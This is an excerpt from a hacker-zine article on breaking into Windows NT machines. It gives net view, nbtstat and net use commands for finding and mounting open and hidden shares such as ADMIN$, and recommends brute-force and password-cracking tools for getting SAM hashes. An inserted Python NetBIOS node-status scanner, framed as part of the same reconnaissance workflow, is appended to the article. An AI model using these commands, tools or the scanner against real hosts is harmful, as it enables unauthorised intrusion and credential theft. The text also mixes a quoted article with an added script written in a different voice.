2.) Kurruppt2k. "Security Through NT? Not Likely", HQ Vol 16 #4, pp. 7-9. (Only excerpts of this article are provided here.)

Now, this entire article refers to breaking into NT over the Internet, so logging in isn't feasible ....

If port 139 is open, though (which it almost always is on an NT Server, and oftentimes is on NT Workstation and Windows 9.x), you can use Client for Microsoft Networks to connect to it. First make sure you have the client installed - go to Control Panel, then Network (you should also have NetBIOS, NetBEUI, and TCP/IP installed). You will use the Net command to do this.

Once you find your target NT machine and see an open port 139, your first step is to find out if there are any open shares. To find out, type this at a command prompt:

C:\>net view \\[ip address]

If you get an error message, it probably means that the computer you attempted to connect to had no open shares (or possibly that you don't have Windows Networking set up correctly on your machine, so check!). If shares exist, you will see a list of them, including the share name, share type (disk, printer, etc.), and any comments the sysadmin wanted to mention. For more NetBIOS information on this machine (name table, workgroup/domain, MAC address), use the "nbtstat" command: nbtstat -A [ip address].

If you see no open shares, there is still a possibility of hidden shares. Common hidden share names include:

* (samba) ......
*SMB (samba) .....
*SMBSERVER (samba) ...
ADMIN$ (remote administration - can you say "root shell"?)

To connect to any share, visible or hidden, you again use the Net command, in the following fashion:

C:\>net use i: \\[ip address]\[share name]

To check for hidden shares, just try to connect to the names given above, or any others you can think of. If it exists, you'll connect. Once you receive the "The command completed successfully" message, you are connected to the NT machine. Logical drive I: (or whatever drive letter you assigned) now becomes that share - you've mapped a network drive to it.
This is similar to mounting remote filesystems in UNIX. So to see what you've connected to, change the drive to I: and issue a "dir". You can now use any DOS commands to explore the share. The share, however, may be password protected.

......

Utilities

Here I will outline a few useful tools you should have when planning to break into an NT box.

Legion is a Windows share scanner - it will automate doing Net View commands on an entire subnet (or multiple subnets). Launch it, sit back, and watch as it combs networks for open shares. If you prefer doing everything from UNIX, WinHack Gold will do the same thing.

NAT (NetBIOS Auditing Tool) is a great program by the makers of Legion. It will attempt to connect to any open share you specify, attacking with passwords you provide in a wordlist. It also looks for hidden shares.

L0phtCrack is an NT password cracker. Getting NT passwords can be tricky - see the "Password Cracking" section.

And finally AGENT SMITH. This program will essentially brute force the hell out of the target, and log all responses to a file of your choice. Oftentimes this will be your only way to break through password protection on your share.

All four of these programs are available at The CyberUnderground (www.users.uswest.net/~kurruppt2k).

Password Cracking

All the hashes reside in the SAM (Security Account Manager) hive of the registry. To get to the hive, you have a few options. If you're running Windows NT yourself, you can install L0phtCrack and attempt a Remote Registry Dump. If the machine you're targeting allows for registry sharing, you will have the entire SAM hive imported into L0phtCrack. Most often, though, this doesn't work. You could always do a core dump, convert the autopsied data into ASCII, and pick out the hashes.
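The nbtstat step in the share-enumeration walkthrough above asks the target's NetBIOS name service (UDP port 137) for its name table; that table is where the computer name, the workgroup or domain, the MAC address and the presence of the Server service (the thing that hands out shares on port 139) come from. The following Python script is an added example, not code from the article or from any of the tools it lists: it builds the same node status request that "nbtstat -A" sends, parses the reply (name table plus the MAC address at the head of the statistics block), and explains the name suffixes. The reply it parses when run without arguments is constructed inline (host name NTSRV1, workgroup WORKGROUP and the MAC are made up), so it runs offline; node_status() sends the real query when given an IP address.

```python
import socket
import struct

NBSTAT = 0x0021   # NetBIOS node status (NBSTAT) resource record type
NB_PORT = 137     # NetBIOS name service

# Well-known values of the 16th byte of a NetBIOS name; unique vs group comes from the flags.
SUFFIXES = {
    0x00: "Workstation service / computer name (unique) or workgroup-domain name (group)",
    0x03: "Messenger service",
    0x1B: "Domain master browser",
    0x1C: "Domain controllers (group)",
    0x1D: "Master browser",
    0x1E: "Browser elections (group)",
    0x20: "Server service (file/print shares over port 139)",
}


def _encode_name(raw16: bytes) -> bytes:
    """First-level encoding: each of the 16 name bytes becomes two letters in 'A'..'P'."""
    enc = bytes(c for b in raw16 for c in (0x41 + (b >> 4), 0x41 + (b & 0x0F)))
    return bytes([32]) + enc + b"\x00"


# The '*' wildcard name (asterisk followed by 15 NULs) that a node status query carries.
WILDCARD_QNAME = _encode_name(b"*" + b"\x00" * 15)   # label reads "CKAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA"


def build_node_status_request(txid: int) -> bytes:
    """The 50-byte query nbtstat -A sends: header with QDCOUNT=1, '*' name, type NBSTAT, class IN."""
    header = struct.pack(">HHHHHH", txid, 0x0000, 1, 0, 0, 0)
    return header + WILDCARD_QNAME + struct.pack(">HH", NBSTAT, 0x0001)


def parse_node_status_response(data: bytes, txid=None) -> dict:
    """Extract the name table and the MAC address from a node status reply."""
    rid, flags, _qd, an, _ns, _ar = struct.unpack(">HHHHHH", data[:12])
    if txid is not None and rid != txid:
        raise ValueError("transaction id mismatch")
    if not flags & 0x8000 or an < 1:
        raise ValueError("not a node status response")
    pos = 12
    if data[pos] & 0xC0 == 0xC0:        # compression pointer back to the question name
        pos += 2
    else:                               # full label sequence ending in a zero-length label
        while data[pos]:
            pos += 1 + data[pos]
        pos += 1
    rtype, _rclass, _ttl, rdlen = struct.unpack(">HHIH", data[pos:pos + 10])
    pos += 10
    if rtype != NBSTAT:
        raise ValueError("unexpected record type 0x%04x" % rtype)
    rdata = data[pos:pos + rdlen]
    count, off, names = rdata[0], 1, []
    for _ in range(count):              # 16-byte name followed by a 16-bit flags word
        raw = rdata[off:off + 16]
        nflags = struct.unpack(">H", rdata[off + 16:off + 18])[0]
        off += 18
        suffix = raw[15]
        names.append({
            "name": raw[:15].rstrip(b" ").decode("latin-1"),
            "suffix": suffix,
            "group": bool(nflags & 0x8000),    # G bit: group name rather than unique name
            "active": bool(nflags & 0x0400),   # ACT bit
            "meaning": SUFFIXES.get(suffix, "unknown suffix 0x%02x" % suffix),
        })
    mac = rdata[off:off + 6]            # the statistics block starts with the unit ID (MAC address)
    return {"names": names, "mac": ":".join("%02X" % b for b in mac)}


def has_server_service(table: dict) -> bool:
    """True when a unique <20> name is registered, i.e. the host offers shares on port 139."""
    return any(n["suffix"] == 0x20 and not n["group"] for n in table["names"])


def node_status(ip: str, timeout: float = 2.0, txid: int = 0x1234) -> dict:
    """Send the real query (what 'nbtstat -A ip' does) and parse the answer."""
    with socket.socket(socket.AF_INET, socket.SOCK_DGRAM) as s:
        s.settimeout(timeout)
        s.sendto(build_node_status_request(txid), (ip, NB_PORT))
        data, _ = s.recvfrom(4096)
    return parse_node_status_response(data, txid)


def _sample_response(txid: int = 0x1234) -> bytes:
    """Constructed reply for offline use; host name, workgroup and MAC are made up."""
    entries = [(b"NTSRV1", 0x00, 0x0400), (b"WORKGROUP", 0x00, 0x8400),
               (b"NTSRV1", 0x20, 0x0400), (b"WORKGROUP", 0x1E, 0x8400)]
    body = b"".join(n.ljust(15, b" ") + bytes([sfx]) + struct.pack(">H", fl) for n, sfx, fl in entries)
    rdata = bytes([len(entries)]) + body + bytes.fromhex("00e0c5a1b2c3") + b"\x00" * 40
    header = struct.pack(">HHHHHH", txid, 0x8400, 0, 1, 0, 0)   # response + authoritative answer
    return header + WILDCARD_QNAME + struct.pack(">HHIH", NBSTAT, 0x0001, 0, len(rdata)) + rdata


if __name__ == "__main__":
    import sys
    table = node_status(sys.argv[1]) if len(sys.argv) > 1 else parse_node_status_response(_sample_response())
    for n in table["names"]:
        print("%-15s <%02X> %-6s %s" % (n["name"], n["suffix"], "GROUP" if n["group"] else "UNIQUE", n["meaning"]))
    print("MAC:", table["mac"], "| server service registered:", has_server_service(table))
```

Run it with an IP address to query a live host, or with no arguments to see the constructed table. A unique <20> entry is the quickest sign that "net view" and "net use" against port 139 are worth trying; a group <00> entry gives you the workgroup or domain name for later guessing.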